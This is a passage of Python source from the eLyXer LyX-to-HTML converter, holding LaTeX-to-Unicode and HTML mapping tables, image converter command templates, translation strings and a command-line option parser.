u'\\rightthreetimes': u'⋌', u'\\rimg': u'⦈', u'\\risingdotseq': u'≓',
u'\\rrbracket': u'⟧', u'\\rsub': u'⩥', u'\\rtimes': u'⋊',
u'\\sagittarius': u'♐', u'\\saturn': u'♄', u'\\scorpio': u'♏',
u'\\searrow': u'↘', u'\\sec': u'sec', u'\\second': u'″', u'\\setminus': u'∖',
u'\\sharp': u'♯', u'\\simeq': u'≃', u'\\sin': u'sin', u'\\sinh': u'sinh',
u'\\sixteenthnote': u'♬', u'\\skull': u'☠', u'\\slash': u'∕',
u'\\smallsetminus': u'∖', u'\\smalltriangledown': u'▿',
u'\\smalltriangleleft': u'◃', u'\\smalltriangleright': u'▹',
u'\\smalltriangleup': u'▵', u'\\smile': u'⌣', u'\\smiley': u'☺',
u'\\spadesuit': u'♠', u'\\spddot': u'¨', u'\\sphat': u'',
u'\\sphericalangle': u'∢', u'\\spot': u'⦁', u'\\sptilde': u'~',
u'\\sqcap': u'⊓', u'\\sqcup': u'⊔', u'\\sqsubset': u'⊏',
u'\\sqsubseteq': u'⊑', u'\\sqsupset': u'⊐', u'\\sqsupseteq': u'⊒',
u'\\square': u'□', u'\\sslash': u'⫽', u'\\star': u'⋆', u'\\steaming': u'☕',
u'\\subseteqq': u'⫅', u'\\subsetneqq': u'⫋', u'\\succ': u'≻',
u'\\succcurlyeq': u'≽', u'\\succeq': u'≽', u'\\succnsim': u'⋩',
u'\\succsim': u'≿', u'\\sun': u'☼', u'\\sup': u'sup', u'\\supseteqq': u'⫆',
u'\\supsetneqq': u'⫌', u'\\surd': u'√', u'\\swarrow': u'↙',
u'\\swords': u'⚔', u'\\talloblong': u'⫾', u'\\tan': u'tan',
u'\\tanh': u'tanh', u'\\taurus': u'♉', u'\\textasciicircum': u'^',
u'\\textasciitilde': u'~', u'\\textbackslash': u'\\',
u'\\textcopyright': u'©\'', u'\\textdegree': u'°', u'\\textellipsis': u'…',
u'\\textemdash': u'—', u'\\textendash': u'—', u'\\texteuro': u'€',
u'\\textgreater': u'>', u'\\textless': u'<', u'\\textordfeminine': u'ª',
u'\\textordmasculine': u'º', u'\\textquotedblleft': u'“',
u'\\textquotedblright': u'”', u'\\textquoteright': u'’',
u'\\textregistered': u'®', u'\\textrightarrow': u'→',
u'\\textsection': u'§', u'\\texttrademark': u'™',
u'\\texttwosuperior': u'²', u'\\textvisiblespace': u' ',
u'\\therefore': u'∴', u'\\third': u'‴', u'\\top': u'⊤', u'\\triangle': u'△',
u'\\triangleleft': u'⊲', u'\\trianglelefteq': u'⊴', u'\\triangleq': u'≜',
u'\\triangleright': u'▷', u'\\trianglerighteq': u'⊵',
u'\\twoheadleftarrow': u'↞', u'\\twoheadrightarrow': u'↠',
u'\\twonotes': u'♫', u'\\udot': u'⊍', u'\\ulcorner': u'⌜', u'\\unlhd': u'⊴',
u'\\unrhd': u'⊵', u'\\unrhl': u'⊵', u'\\uparrow': u'↑',
u'\\updownarrow': u'↕', u'\\upharpoonleft': u'↿', u'\\upharpoonright': u'↾',
u'\\uplus': u'⊎', u'\\upuparrows': u'⇈', u'\\uranus': u'♅',
u'\\urcorner': u'⌝', u'\\vDash': u'⊨', u'\\varclubsuit': u'♧',
u'\\vardiamondsuit': u'♦', u'\\varheartsuit': u'♥', u'\\varnothing': u'∅',
u'\\varspadesuit': u'♤', u'\\vdash': u'⊢', u'\\vdots': u'⋮', u'\\vee': u'∨',
u'\\vee)': u'∨', u'\\veebar': u'⊻', u'\\vert': u'∣', u'\\virgo': u'♍',
u'\\warning': u'⚠', u'\\wasylozenge': u'⌑', u'\\wedge': u'∧',
u'\\wedge)': u'∧', u'\\wp': u'℘', u'\\wr': u'≀', u'\\yen': u'¥',
u'\\yinyang': u'☯', u'\\{': u'{', u'\\|': u'∥', u'\\}': u'}',
}
decoratedcommand = {
}
decoratingfunctions = {
u'\\overleftarrow': u'⟵', u'\\overrightarrow': u'⟶', u'\\widehat': u'^',
}
endings = {
u'bracket': u'}', u'complex': u'\\]', u'endafter': u'}',
u'endbefore': u'\\end{', u'squarebracket': u']',
}
environments = {
u'align': [u'r', u'l',], u'eqnarray': [u'r', u'c', u'l',],
u'gathered': [u'l', u'l',],
}
fontfunctions = {
u'\\boldsymbol': u'b', u'\\mathbb': u'span class="blackboard"',
u'\\mathbb{A}': u'𝔸', u'\\mathbb{B}': u'𝔹', u'\\mathbb{C}': u'ℂ',
u'\\mathbb{D}': u'𝔻', u'\\mathbb{E}': u'𝔼', u'\\mathbb{F}': u'𝔽',
u'\\mathbb{G}': u'𝔾', u'\\mathbb{H}': u'ℍ', u'\\mathbb{J}': u'𝕁',
u'\\mathbb{K}': u'𝕂', u'\\mathbb{L}': u'𝕃', u'\\mathbb{N}': u'ℕ',
u'\\mathbb{O}': u'𝕆', u'\\mathbb{P}': u'ℙ', u'\\mathbb{Q}': u'ℚ',
u'\\mathbb{R}': u'ℝ', u'\\mathbb{S}': u'𝕊', u'\\mathbb{T}': u'𝕋',
u'\\mathbb{W}': u'𝕎', u'\\mathbb{Z}': u'ℤ', u'\\mathbf': u'b',
u'\\mathcal': u'span class="scriptfont"', u'\\mathcal{B}': u'ℬ',
u'\\mathcal{E}': u'ℰ', u'\\mathcal{F}': u'ℱ', u'\\mathcal{H}': u'ℋ',
u'\\mathcal{I}': u'ℐ', u'\\mathcal{L}': u'ℒ', u'\\mathcal{M}': u'ℳ',
u'\\mathcal{R}': u'ℛ', u'\\mathfrak': u'span class="fraktur"',
u'\\mathfrak{C}': u'ℭ', u'\\mathfrak{F}': u'𝔉', u'\\mathfrak{H}': u'ℌ',
u'\\mathfrak{I}': u'ℑ', u'\\mathfrak{R}': u'ℜ', u'\\mathfrak{Z}': u'ℨ',
u'\\mathit': u'i', u'\\mathring{A}': u'Å', u'\\mathring{U}': u'Ů',
u'\\mathring{a}': u'å', u'\\mathring{u}': u'ů', u'\\mathring{w}': u'ẘ',
u'\\mathring{y}': u'ẙ', u'\\mathrm': u'span class="mathrm"',
u'\\mathscr': u'span class="scriptfont"', u'\\mathscr{B}': u'ℬ',
u'\\mathscr{E}': u'ℰ', u'\\mathscr{F}': u'ℱ', u'\\mathscr{H}': u'ℋ',
u'\\mathscr{I}': u'ℐ', u'\\mathscr{L}': u'ℒ', u'\\mathscr{M}': u'ℳ',
u'\\mathscr{R}': u'ℛ', u'\\mathsf': u'span class="mathsf"',
u'\\mathtt': u'tt',
}
hybridfunctions = {
u'\\addcontentsline': [u'{$p!}{$q!}{$r!}', u'f0{}', u'ignored',],
u'\\addtocontents': [u'{$p!}{$q!}', u'f0{}', u'ignored',],
u'\\backmatter': [u'', u'f0{}', u'ignored',],
u'\\binom': [u'{$1}{$2}', u'f2{(}f0{f1{$1}f1{$2}}f2{)}', u'span class="binom"', u'span class="binomstack"', u'span class="bigsymbol"',],
u'\\boxed': [u'{$1}', u'f0{$1}', u'span class="boxed"',],
u'\\cfrac': [u'[$p!]{$1}{$2}', u'f0{f3{(}f1{$1}f3{)/(}f2{$2}f3{)}}', u'span class="fullfraction"', u'span class="numerator align-$p"', u'span class="denominator"', u'span class="ignored"',],
u'\\color': [u'{$p!}{$1}', u'f0{$1}', u'span style="color: $p;"',],
u'\\colorbox': [u'{$p!}{$1}', u'f0{$1}', u'span class="colorbox" style="background: $p;"',],
u'\\dbinom': [u'{$1}{$2}', u'(f0{f1{f2{$1}}f1{f2{ }}f1{f2{$2}}})', u'span class="binomial"', u'span class="binomrow"', u'span class="binomcell"',],
u'\\dfrac': [u'{$1}{$2}', u'f0{f3{(}f1{$1}f3{)/(}f2{$2}f3{)}}', u'span class="fullfraction"', u'span class="numerator"', u'span class="denominator"', u'span class="ignored"',],
u'\\displaystyle': [u'{$1}', u'f0{$1}', u'span class="displaystyle"',],
u'\\fancyfoot': [u'[$p!]{$q!}', u'f0{}', u'ignored',],
u'\\fancyhead': [u'[$p!]{$q!}', u'f0{}', u'ignored',],
u'\\fbox': [u'{$1}', u'f0{$1}', u'span class="fbox"',],
u'\\fboxrule': [u'{$p!}', u'f0{}', u'ignored',],
u'\\fboxsep': [u'{$p!}', u'f0{}', u'ignored',],
u'\\fcolorbox': [u'{$p!}{$q!}{$1}', u'f0{$1}', u'span class="boxed" style="border-color: $p; background: $q;"',],
u'\\frac': [u'{$1}{$2}', u'f0{f3{(}f1{$1}f3{)/(}f2{$2}f3{)}}', u'span class="fraction"', u'span class="numerator"', u'span class="denominator"', u'span class="ignored"',],
u'\\framebox': [u'[$p!][$q!]{$1}', u'f0{$1}', u'span class="framebox align-$q" style="width: $p;"',],
u'\\frontmatter': [u'', u'f0{}', u'ignored',],
u'\\href': [u'[$o]{$u!}{$t!}', u'f0{$t}', u'a href="$u"',],
u'\\hspace': [u'{$p!}', u'f0{ }', u'span class="hspace" style="width: $p;"',],
u'\\leftroot': [u'{$p!}', u'f0{ }', u'span class="leftroot" style="width: $p;px"',],
u'\\mainmatter': [u'', u'f0{}', u'ignored',],
u'\\markboth': [u'{$p!}{$q!}', u'f0{}', u'ignored',],
u'\\markright': [u'{$p!}', u'f0{}', u'ignored',],
u'\\nicefrac': [u'{$1}{$2}', u'f0{f1{$1}⁄f2{$2}}', u'span class="fraction"', u'sup class="numerator"', u'sub class="denominator"', u'span class="ignored"',],
u'\\parbox': [u'[$p!]{$w!}{$1}', u'f0{1}', u'div class="Boxed" style="width: $w;"',],
u'\\raisebox': [u'{$p!}{$1}', u'f0{$1.font}', u'span class="raisebox" style="vertical-align: $p;"',],
u'\\renewenvironment': [u'{$1!}{$2!}{$3!}', u'',],
u'\\rule': [u'[$v!]{$w!}{$h!}', u'f0/', u'hr class="line" style="width: $w; height: $h;"',],
u'\\scriptscriptstyle': [u'{$1}', u'f0{$1}', u'span class="scriptscriptstyle"',],
u'\\scriptstyle': [u'{$1}', u'f0{$1}', u'span class="scriptstyle"',],
u'\\sqrt': [u'[$0]{$1}', u'f0{f1{$0}f2{√}f4{(}f3{$1}f4{)}}', u'span class="sqrt"', u'sup class="root"', u'span class="radical"', u'span class="root"', u'span class="ignored"',],
u'\\stackrel': [u'{$1}{$2}', u'f0{f1{$1}f2{$2}}', u'span class="stackrel"', u'span class="upstackrel"', u'span class="downstackrel"',],
u'\\tbinom': [u'{$1}{$2}', u'(f0{f1{f2{$1}}f1{f2{ }}f1{f2{$2}}})', u'span class="binomial"', u'span class="binomrow"', u'span class="binomcell"',],
u'\\textcolor': [u'{$p!}{$1}', u'f0{$1}', u'span style="color: $p;"',],
u'\\textstyle': [u'{$1}', u'f0{$1}', u'span class="textstyle"',],
u'\\thispagestyle': [u'{$p!}', u'f0{}', u'ignored',],
u'\\unit': [u'[$0]{$1}', u'$0f0{$1.font}', u'span class="unit"',],
u'\\unitfrac': [u'[$0]{$1}{$2}', u'$0f0{f1{$1.font}⁄f2{$2.font}}', u'span class="fraction"', u'sup class="unit"', u'sub class="unit"',],
u'\\uproot': [u'{$p!}', u'f0{ }', u'span class="uproot" style="width: $p;px"',],
u'\\url': [u'{$u!}', u'f0{$u}', u'a href="$u"',],
u'\\vspace': [u'{$p!}', u'f0{ }', u'span class="vspace" style="height: $p;"',],
}
hybridsizes = {
u'\\binom': u'$1+$2', u'\\cfrac': u'$1+$2', u'\\dbinom': u'$1+$2+1',
u'\\dfrac': u'$1+$2', u'\\frac': u'$1+$2', u'\\tbinom': u'$1+$2+1',
}
labelfunctions = {
u'\\label': u'a name="#"',
}
limitcommands = {
u'\\biginterleave': u'⫼', u'\\bigsqcap': u'⨅', u'\\fint': u'⨏',
u'\\iiiint': u'⨌', u'\\int': u'∫', u'\\intop': u'∫', u'\\lim': u'lim',
u'\\prod': u'∏', u'\\smallint': u'∫', u'\\sqint': u'⨖', u'\\sum': u'∑',
u'\\varointclockwise': u'∲', u'\\varprod': u'⨉', u'\\zcmp': u'⨟',
u'\\zhide': u'⧹', u'\\zpipe': u'⨠', u'\\zproject': u'⨡',
}
misccommands = {
u'\\limits': u'LimitPreviousCommand', u'\\newcommand': u'MacroDefinition',
u'\\renewcommand': u'MacroDefinition',
u'\\setcounter': u'SetCounterFunction', u'\\tag': u'FormulaTag',
u'\\tag*': u'FormulaTag', u'\\today': u'TodayCommand',
}
modified = {
u'\n': u'', u' ': u'', u'$': u'', u'&': u' ', u'\'': u'’', u'+': u' + ',
u',': u', ', u'-': u' − ', u'/': u' ⁄ ', u':': u' : ', u'<': u' < ',
u'=': u' = ', u'>': u' > ', u'@': u'', u'~': u'',
}
onefunctions = {
u'\\Big': u'span class="bigsymbol"', u'\\Bigg': u'span class="hugesymbol"',
u'\\bar': u'span class="bar"', u'\\begin{array}': u'span class="arraydef"',
u'\\big': u'span class="symbol"', u'\\bigg': u'span class="largesymbol"',
u'\\bigl': u'span class="bigsymbol"', u'\\bigr': u'span class="bigsymbol"',
u'\\centering': u'span class="align-center"',
u'\\ensuremath': u'span class="ensuremath"',
u'\\hphantom': u'span class="phantom"',
u'\\noindent': u'span class="noindent"',
u'\\overbrace': u'span class="overbrace"',
u'\\overline': u'span class="overline"',
u'\\phantom': u'span class="phantom"',
u'\\underbrace': u'span class="underbrace"', u'\\underline': u'u',
u'\\vphantom': u'span class="phantom"',
}
spacedcommands = {
u'\\Bot': u'⫫', u'\\Doteq': u'≑', u'\\DownArrowBar': u'⤓',
u'\\DownLeftTeeVector': u'⥞', u'\\DownLeftVectorBar': u'⥖',
u'\\DownRightTeeVector': u'⥟', u'\\DownRightVectorBar': u'⥗',
u'\\Equal': u'⩵', u'\\LeftArrowBar': u'⇤', u'\\LeftDownTeeVector': u'⥡',
u'\\LeftDownVectorBar': u'⥙', u'\\LeftTeeVector': u'⥚',
u'\\LeftTriangleBar': u'⧏', u'\\LeftUpTeeVector': u'⥠',
u'\\LeftUpVectorBar': u'⥘', u'\\LeftVectorBar': u'⥒',
u'\\Leftrightarrow': u'⇔', u'\\Longmapsfrom': u'⟽', u'\\Longmapsto': u'⟾',
u'\\MapsDown': u'↧', u'\\MapsUp': u'↥', u'\\Nearrow': u'⇗',
u'\\NestedGreaterGreater': u'⪢', u'\\NestedLessLess': u'⪡',
u'\\NotGreaterLess': u'≹', u'\\NotGreaterTilde': u'≵',
u'\\NotLessTilde': u'≴', u'\\Nwarrow': u'⇖', u'\\Proportion': u'∷',
u'\\RightArrowBar': u'⇥', u'\\RightDownTeeVector': u'⥝',
u'\\RightDownVectorBar': u'⥕', u'\\RightTeeVector': u'⥛',
u'\\RightTriangleBar': u'⧐', u'\\RightUpTeeVector': u'⥜',
u'\\RightUpVectorBar': u'⥔', u'\\RightVectorBar': u'⥓',
u'\\Rightarrow': u'⇒', u'\\Same': u'⩶', u'\\Searrow': u'⇘',
u'\\Swarrow': u'⇙', u'\\Top': u'⫪', u'\\UpArrowBar': u'⤒', u'\\VDash': u'⊫',
u'\\approx': u'≈', u'\\approxeq': u'≊', u'\\backsim': u'∽', u'\\barin': u'⋶',
u'\\barleftharpoon': u'⥫', u'\\barrightharpoon': u'⥭', u'\\bij': u'⤖',
u'\\coloneq': u'≔', u'\\corresponds': u'≙', u'\\curlyeqprec': u'⋞',
u'\\curlyeqsucc': u'⋟', u'\\dashrightarrow': u'⇢', u'\\dlsh': u'↲',
u'\\downdownharpoons': u'⥥', u'\\downuparrows': u'⇵',
u'\\downupharpoons': u'⥯', u'\\drsh': u'↳', u'\\eqslantgtr': u'⪖',
u'\\eqslantless': u'⪕', u'\\equiv': u'≡', u'\\ffun': u'⇻', u'\\finj': u'⤕',
u'\\ge': u'≥', u'\\geq': u'≥', u'\\ggcurly': u'⪼', u'\\gnapprox': u'⪊',
u'\\gneq': u'⪈', u'\\gtrapprox': u'⪆', u'\\hash': u'⋕', u'\\iddots': u'⋰',
u'\\implies': u' ⇒ ', u'\\in': u'∈', u'\\le': u'≤', u'\\leftarrow': u'←',
u'\\leftarrowtriangle': u'⇽', u'\\leftbarharpoon': u'⥪',
u'\\leftrightarrowtriangle': u'⇿', u'\\leftrightharpoon': u'⥊',
u'\\leftrightharpoondown': u'⥐', u'\\leftrightharpoonup': u'⥎',
u'\\leftrightsquigarrow': u'↭', u'\\leftslice': u'⪦',
u'\\leftsquigarrow': u'⇜', u'\\leftupdownharpoon': u'⥑', u'\\leq': u'≤',
u'\\lessapprox': u'⪅', u'\\llcurly': u'⪻', u'\\lnapprox': u'⪉',
u'\\lneq': u'⪇', u'\\longmapsfrom': u'⟻', u'\\multimapboth': u'⧟',
u'\\multimapdotbothA': u'⊶', u'\\multimapdotbothB': u'⊷',
u'\\multimapinv': u'⟜', u'\\nVdash': u'⊮', u'\\ne': u'≠', u'\\neq': u'≠',
u'\\ngeq': u'≱', u'\\nleq': u'≰', u'\\nni': u'∌', u'\\not\\in': u'∉',
u'\\notasymp': u'≭', u'\\npreceq': u'⋠', u'\\nsqsubseteq': u'⋢',
u'\\nsqsupseteq': u'⋣', u'\\nsubset': u'⊄', u'\\nsucceq': u'⋡',
u'\\pfun': u'⇸', u'\\pinj': u'⤔', u'\\precapprox': u'⪷', u'\\preceqq': u'⪳',
u'\\precnapprox': u'⪹', u'\\precnsim': u'⋨', u'\\propto': u'∝',
u'\\psur': u'⤀', u'\\rightarrow': u'→', u'\\rightarrowtriangle': u'⇾',
u'\\rightbarharpoon': u'⥬', u'\\rightleftharpoon': u'⥋',
u'\\rightslice': u'⪧', u'\\rightsquigarrow': u'⇝',
u'\\rightupdownharpoon': u'⥏', u'\\sim': u'~', u'\\strictfi': u'⥼',
u'\\strictif': u'⥽', u'\\subset': u'⊂', u'\\subseteq': u'⊆',
u'\\subsetneq': u'⊊', u'\\succapprox': u'⪸', u'\\succeqq': u'⪴',
u'\\succnapprox': u'⪺', u'\\supset': u'⊃', u'\\supseteq': u'⊇',
u'\\supsetneq': u'⊋', u'\\times': u'×', u'\\to': u'→',
u'\\updownarrows': u'⇅', u'\\updownharpoons': u'⥮', u'\\upupharpoons': u'⥣',
u'\\vartriangleleft': u'⊲', u'\\vartriangleright': u'⊳',
}
starts = {
u'beginafter': u'}', u'beginbefore': u'\\begin{', u'bracket': u'{',
u'command': u'\\', u'comment': u'%', u'complex': u'\\[', u'simple': u'$',
u'squarebracket': u'[', u'unnumbered': u'*',
}
symbolfunctions = {
u'^': u'sup', u'_': u'sub',
}
textfunctions = {
u'\\mbox': u'span class="mbox"', u'\\text': u'span class="text"',
u'\\textbf': u'b', u'\\textipa': u'span class="textipa"', u'\\textit': u'i',
u'\\textnormal': u'span class="textnormal"',
u'\\textrm': u'span class="textrm"',
u'\\textsc': u'span class="versalitas"',
u'\\textsf': u'span class="textsf"', u'\\textsl': u'i', u'\\texttt': u'tt',
u'\\textup': u'span class="normal"',
}
unmodified = {
u'characters': [u'.', u'*', u'€', u'(', u')', u'[', u']', u'·', u'!', u';', u'|', u'§', u'"',],
}
urls = {
u'googlecharts': u'http://chart.googleapis.com/chart?cht=tx&chl=',
}
class GeneralConfig(object):
"Configuration class from elyxer.config file"
version = {
u'date': u'2015-02-26', u'lyxformat': u'413', u'number': u'1.2.5',
}
class HeaderConfig(object):
"Configuration class from elyxer.config file"
parameters = {
u'beginpreamble': u'\\begin_preamble', u'branch': u'\\branch',
u'documentclass': u'\\textclass', u'endbranch': u'\\end_branch',
u'endpreamble': u'\\end_preamble', u'language': u'\\language',
u'lstset': u'\\lstset', u'outputchanges': u'\\output_changes',
u'paragraphseparation': u'\\paragraph_separation',
u'pdftitle': u'\\pdf_title', u'secnumdepth': u'\\secnumdepth',
u'tocdepth': u'\\tocdepth',
}
styles = {
u'article': [u'article', u'aastex', u'aapaper', u'acmsiggraph', u'sigplanconf', u'achemso', u'amsart', u'apa', u'arab-article', u'armenian-article', u'article-beamer', u'chess', u'dtk', u'elsarticle', u'heb-article', u'IEEEtran', u'iopart', u'kluwer', u'scrarticle-beamer', u'scrartcl', u'extarticle', u'paper', u'mwart', u'revtex4', u'spie', u'svglobal3', u'ltugboat', u'agu-dtd', u'jgrga', u'agums', u'entcs', u'egs', u'ijmpc', u'ijmpd', u'singlecol-new', u'doublecol-new', u'isprs', u'tarticle', u'jsarticle', u'jarticle', u'jss', u'literate-article', u'siamltex', u'cl2emult', u'llncs', u'svglobal', u'svjog', u'svprobth',],
u'book': [u'book', u'amsbook', u'scrbook', u'extbook', u'tufte-book', u'report', u'extreport', u'scrreprt', u'memoir', u'tbook', u'jsbook', u'jbook', u'mwbk', u'svmono', u'svmult', u'treport', u'jreport', u'mwrep',],
}
class ImageConfig(object):
"Configuration class from elyxer.config file"
converters = {
u'imagemagick': u'convert[ -density $scale][ -define $format:use-cropbox=true] "$input" "$output"',
u'inkscape': u'inkscape "$input" --export-png="$output"',
u'lyx': u'lyx -C "$input" "$output"',
}
cropboxformats = {
u'.eps': u'ps', u'.pdf': u'pdf', u'.ps': u'ps',
}
formats = {
u'default': u'.png', u'vector': [u'.svg', u'.eps',],
}
class LayoutConfig(object):
"Configuration class from elyxer.config file"
groupable = {
u'allowed': [u'StringContainer', u'Constant', u'TaggedText', u'Align', u'TextFamily', u'EmphaticText', u'VersalitasText', u'BarredText', u'SizeText', u'ColorText', u'LangLine', u'Formula',],
}
class NewfangleConfig(object):
"Configuration class from elyxer.config file"
constants = {
u'chunkref': u'chunkref{', u'endcommand': u'}', u'endmark': u'>',
u'startcommand': u'\\', u'startmark': u'=<',
}
class NumberingConfig(object):
"Configuration class from elyxer.config file"
layouts = {
u'ordered': [u'Chapter', u'Section', u'Subsection', u'Subsubsection', u'Paragraph',],
u'roman': [u'Part', u'Book',],
}
sequence = {
u'symbols': [u'*', u'**', u'†', u'‡', u'§', u'§§', u'¶', u'¶¶', u'#', u'##',],
}
class StyleConfig(object):
"Configuration class from elyxer.config file"
hspaces = {
u'\\enskip{}': u' ', u'\\hfill{}': u'<span class="hfill"> </span>',
u'\\hspace*{\\fill}': u' ', u'\\hspace*{}': u'', u'\\hspace{}': u' ',
u'\\negthinspace{}': u'', u'\\qquad{}': u' ', u'\\quad{}': u' ',
u'\\space{}': u' ', u'\\thinspace{}': u' ', u'~': u' ',
}
quotes = {
u'ald': u'»', u'als': u'›', u'ard': u'«', u'ars': u'‹', u'eld': u'“',
u'els': u'‘', u'erd': u'”', u'ers': u'’', u'fld': u'«',
u'fls': u'‹', u'frd': u'»', u'frs': u'›', u'gld': u'„', u'gls': u'‚',
u'grd': u'“', u'grs': u'‘', u'pld': u'„', u'pls': u'‚', u'prd': u'”',
u'prs': u'’', u'sld': u'”', u'srd': u'”',
}
referenceformats = {
u'eqref': u'(@↕)', u'formatted': u'¶↕', u'nameref': u'$↕', u'pageref': u'#↕',
u'ref': u'@↕', u'vpageref': u'on-page#↕', u'vref': u'@on-page#↕',
}
size = {
u'ignoredtexts': [u'col', u'text', u'line', u'page', u'theight', u'pheight',],
}
vspaces = {
u'bigskip': u'<div class="bigskip"> </div>',
u'defskip': u'<div class="defskip"> </div>',
u'medskip': u'<div class="medskip"> </div>',
u'smallskip': u'<div class="smallskip"> </div>',
u'vfill': u'<div class="vfill"> </div>',
}
class TOCConfig(object):
"Configuration class from elyxer.config file"
extractplain = {
u'allowed': [u'StringContainer', u'Constant', u'TaggedText', u'Align', u'TextFamily', u'EmphaticText', u'VersalitasText', u'BarredText', u'SizeText', u'ColorText', u'LangLine', u'Formula',],
u'cloned': [u'',], u'extracted': [u'',],
}
extracttitle = {
u'allowed': [u'StringContainer', u'Constant', u'Space',],
u'cloned': [u'TextFamily', u'EmphaticText', u'VersalitasText', u'BarredText', u'SizeText', u'ColorText', u'LangLine', u'Formula',],
u'extracted': [u'PlainLayout', u'TaggedText', u'Align', u'Caption', u'StandardLayout', u'FlexInset',],
}
class TagConfig(object):
"Configuration class from elyxer.config file"
barred = {
u'under': u'u',
}
family = {
u'sans': u'span class="sans"', u'typewriter': u'tt',
}
flex = {
u'CharStyle:Code': u'span class="code"',
u'CharStyle:MenuItem': u'span class="menuitem"',
u'Code': u'span class="code"', u'MenuItem': u'span class="menuitem"',
u'Noun': u'span class="noun"', u'Strong': u'span class="strong"',
}
group = {
u'layouts': [u'Quotation', u'Quote',],
}
layouts = {
u'Center': u'div', u'Chapter': u'h?', u'Date': u'h2', u'Paragraph': u'div',
u'Part': u'h1', u'Quotation': u'blockquote', u'Quote': u'blockquote',
u'Section': u'h?', u'Subsection': u'h?', u'Subsubsection': u'h?',
}
listitems = {
u'Enumerate': u'ol', u'Itemize': u'ul',
}
notes = {
u'Comment': u'', u'Greyedout': u'span class="greyedout"', u'Note': u'',
}
script = {
u'subscript': u'sub', u'superscript': u'sup',
}
shaped = {
u'italic': u'i', u'slanted': u'i', u'smallcaps': u'span class="versalitas"',
}
class TranslationConfig(object):
"Configuration class from elyxer.config file"
constants = {
u'Appendix': u'Appendix', u'Book': u'Book', u'Chapter': u'Chapter',
u'Paragraph': u'Paragraph', u'Part': u'Part', u'Section': u'Section',
u'Subsection': u'Subsection', u'Subsubsection': u'Subsubsection',
u'abstract': u'Abstract', u'bibliography': u'Bibliography',
u'figure': u'figure', u'float-algorithm': u'Algorithm ',
u'float-figure': u'Figure ', u'float-listing': u'Listing ',
u'float-table': u'Table ', u'float-tableau': u'Tableau ',
u'footnotes': u'Footnotes', u'generated-by': u'Document generated by ',
u'generated-on': u' on ', u'index': u'Index',
u'jsmath-enable': u'Please enable JavaScript on your browser.',
u'jsmath-requires': u' requires JavaScript to correctly process the mathematics on this page. ',
u'jsmath-warning': u'Warning: ', u'list-algorithm': u'List of Algorithms',
u'list-figure': u'List of Figures', u'list-table': u'List of Tables',
u'list-tableau': u'List of Tableaux', u'main-page': u'Main page',
u'next': u'Next', u'nomenclature': u'Nomenclature',
u'on-page': u' on page ', u'prev': u'Prev', u'references': u'References',
u'toc': u'Table of Contents', u'toc-for': u'Contents for ', u'up': u'Up',
}
languages = {
u'american': u'en', u'british': u'en', u'deutsch': u'de', u'dutch': u'nl',
u'english': u'en', u'french': u'fr', u'ngerman': u'de', u'russian': u'ru',
u'spanish': u'es',
}
class CommandLineParser(object):
"A parser for runtime options"
def __init__(self, options):
self.options = options
def parseoptions(self, args):
"Parse command line options"
if len(args) == 0:
return None
while len(args) > 0 and args[0].startswith('--'):
key, value = self.readoption(args)
if not key:
return 'Option ' + value + ' not recognized'
if not value:
return 'Option ' + key + ' needs a value'
setattr(self.options, key, value)
return None
def readoption(self, args):
"Read the key and value for an option"
arg = args[0][2:]
del args[0]
if '=' in arg:
key = self.readequalskey(arg, args)
else:
key = arg.replace('-', '')
if not hasattr(self.options, key):
return None, key
current = getattr(self.options, key)
if isinstance(current, bool):
return key, True
# read value
if len(args) == 0:
return key, None
if args[0].startswith('"'):
initial = args[0]
del args[0]
return key, self.readquoted(args, initial)
value = args[0].decode('utf-8')
del args[0]
if isinstance(current, list):
current.append(value)
return key, current
return key, value
def readquoted(self, args, initial):
"Read a value between quotes"
Trace.error('Oops')
value = initial[1:]
while len(args) > 0 and not args[0].endswith('"') and not args[0].startswith('--'):
Trace.error('Appending ' + args[0])
value += ' ' + args[0]
del args[0]
if len(args) == 0 or args[0].startswith('--'):
return None
value += ' ' + args[0:-1]
return value
def readequalskey(self, arg, args):
"Read a key using equals"
split = arg.split('=', 1)
key = split[0]
value = split[1]
args.insert(0, value)
return key
class Options(object):
"A set of runtime options"
instance = None
location = None
nocopy = False
copyright = False
debug = False
quiet = False
version = False
hardversion = False
versiondate = False
html = False
help = False
showlines = True
unicode = False
iso885915 = False
css = []
favicon = ''
title = None
directory = None
destdirectory = None
toc = False
toctarget = ''
tocfor = None
forceformat = None
lyxformat = False
target = None
splitpart = None
memory = True
lowmem = False
nobib = False
converter = 'imagemagick'
raw = False
jsmath = None
mathjax = None
nofooter = False
simplemath = False
template = None
noconvert = False
notoclabels = False
letterfoot = True
numberfoot = False
symbolfoot = False
hoverfoot = True
marginfoot = False
endfoot = False
supfoot = True
alignfoot = False
footnotes = None
imageformat = None
copyimages = False
googlecharts = False
embedcss = []
branches = dict()
def parseoptions(self, args):
"Parse command line options"
Options.location = args[0]
del args[0]
parser = CommandLineParser(Options)
result = parser.parseoptions(args)
if result:
Trace.error(result)
self.usage()
self.processoptions()
def processoptions(self):
"Process all options parsed."
if Options.help:
self.usage()
if Options.version:
self.showversion()
if Options.hardversion:
self.showhardversion()
if Options.versiondate:
self.showversiondate()
if Options.lyxformat:
self.showlyxformat()
if Options.splitpart:
try:
Options.splitpart = int(Options.splitpart)
if Options.splitpart <= 0:
Trace.error('--splitpart requires a number bigger than zero')
self.usage()
except:
Trace.error('--splitpart needs a numeric argument, not ' + Options.splitpart)
self.usage()
if Options.lowmem or Options.toc or Options.tocfor:
Options.memory = False
self.parsefootnotes()
if Options.forceformat and not Options.imageformat:
Options.imageformat = Options.forceformat
if Options.imageformat == 'copy':
Options.copyimages = True
if Options.css == []:
Options.css = ['http://elyxer.nongnu.org/lyx.css']
if Options.favicon == '':
pass # no default favicon
if Options.html:
Options.simplemath = True
if Options.toc and not Options.tocfor:
Trace.error('Option --toc is deprecated; use --tocfor "page" instead')
Options.tocfor = Options.toctarget
if Options.nocopy:
Trace.error('Option --nocopy is deprecated; it is no longer needed')
if Options.jsmath:
Trace.error('Option --jsmath is deprecated; use --mathjax instead')
# set in Trace if necessary
for param in dir(Trace):
if param.endswith('mode'):
setattr(Trace, param, getattr(self, param[:-4]))
def usage(self):
"Show correct usage"
Trace.error('Usage: ' + os.path.basename(Options.location) + ' [options] [filein] [fileout]')
Trace.error('Convert LyX input file "filein" to HTML file "fileout".')
Trace.error('If filein (or fileout) is not given use standard input (or output).')
Trace.error('Main program of the eLyXer package (http://elyxer.nongnu.org/).')
self.showoptions()
def parsefootnotes(self):
"Parse footnotes options."
if not Options.footnotes:
return
Options.marginfoot = False
Options.letterfoot = False
Options.hoverfoot = False
